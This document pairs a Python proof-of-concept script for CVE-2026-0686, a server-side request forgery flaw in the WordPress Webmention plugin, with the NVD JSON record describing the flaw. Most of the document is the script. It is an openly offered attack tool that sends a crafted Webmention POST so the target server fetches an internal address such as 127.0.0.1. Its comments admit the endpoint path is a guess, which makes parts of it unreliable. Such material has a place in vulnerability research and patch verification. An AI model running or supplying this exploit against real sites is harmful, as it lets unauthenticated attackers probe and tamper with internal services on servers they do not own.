CVE-2026-0686

#!/usr/bin/env python3 # Proof of Concept for CVE-2026-0686 (SSRF in WordPress Webmention Plugin) # Usage: python3 poc.py <target_url> import requests import sys if len(sys.argv) < 2: print(f"Usage: {sys.argv[0]} <http://target-site.com>") sys.exit(1) target = sys.argv[1].rstrip('/') # The endpoint for webmention is typically /?webmention=endpoint or similar, checking standard WordPress structure # Usually handled by the plugin hooking into the post request. # Based on the vulnerability, we send a request to the receiver. # Attacker controlled server (or internal target) # In a real SSRF, 'source' would be a URL the server visits. # Here we try to make the server fetch an internal resource. internal_target = "http://127.0.0.1:80" # Example: Localhost scan victim_post = f"{target}/?p=1" # Arbitrary post ID # The Webmention payload payload = { 'source': internal_target, 'target': victim_post } print(f"[*] Attempting to trigger SSRRF on {target}") print(f"[*] Trying to force server to connect to: {internal_target}") try: # Sending POST request to the webmention endpoint # Note: The exact endpoint might vary depending on WordPress configuration, # but often it is handled by the plugin intercepting the request. # Common endpoint path discovered in similar plugins is just the base URL with specific parameters or a fixed path. # We will try the standard endpoint. # Based on the plugin code reference (Receiver::post), it listens for webmention requests. endpoint = f"{target}/wp-json/webmention/1.0/endpoint" # REST API endpoint commonly used response = requests.post(endpoint, data=payload, timeout=5) if response.status_code == 202: # Accepted print("[+] Request accepted by server. The server may have sent a request to the internal target.") else: print(f"[-] Server returned status code: {response.status_code}") print(f"Response: {response.text}") except Exception as e: print(f"Error: {e}")

{"cve": {"id": "CVE-2026-0686", "sourceIdentifier": "[email protected]", "published": "2026-04-02T08:16:27.850", "lastModified": "2026-04-27T19:04:22.650", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "The Webmention plugin for WordPress is vulnerable to Server-Side Request Forgery in all versions up to, and including, 5.6.2 in the 'MF2::parse_authorpage' function via the 'Receiver::post' function. This makes it possible for unauthenticated attackers to make web requests to arbitrary locations originating from the web application and can be used to query and modify information from internal services."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:N", "baseScore": 7.2, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "CHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.9, "impactScore": 2.7}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-918"}]}], "references": [{"url": "https://github.com/pfefferle/wordpress-webmention/blob/057223cee18a9e93b017d0f21db6ea77a7686489/includes/handler/class-mf2.php#L878", "source": "[email protected]"}, {"url": "https://plugins.trac.wordpress.org/browser/webmention/tags/5.6.2/includes/class-receiver.php#L260", "source": "[email protected]"}, {"url": "https://plugins.trac.wordpress.org/browser/webmention/tags/5.6.2/includes/handler/class-mf2.php#L877", "source": "[email protected]"}, {"url": "https://plugins.trac.wordpress.org/changeset/3494831/webmention", "source": "[email protected]"}, {"url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/08d15c46-d15f-4803-80be-90bf33335c18?source=cve", "source": "[email protected]"}]}}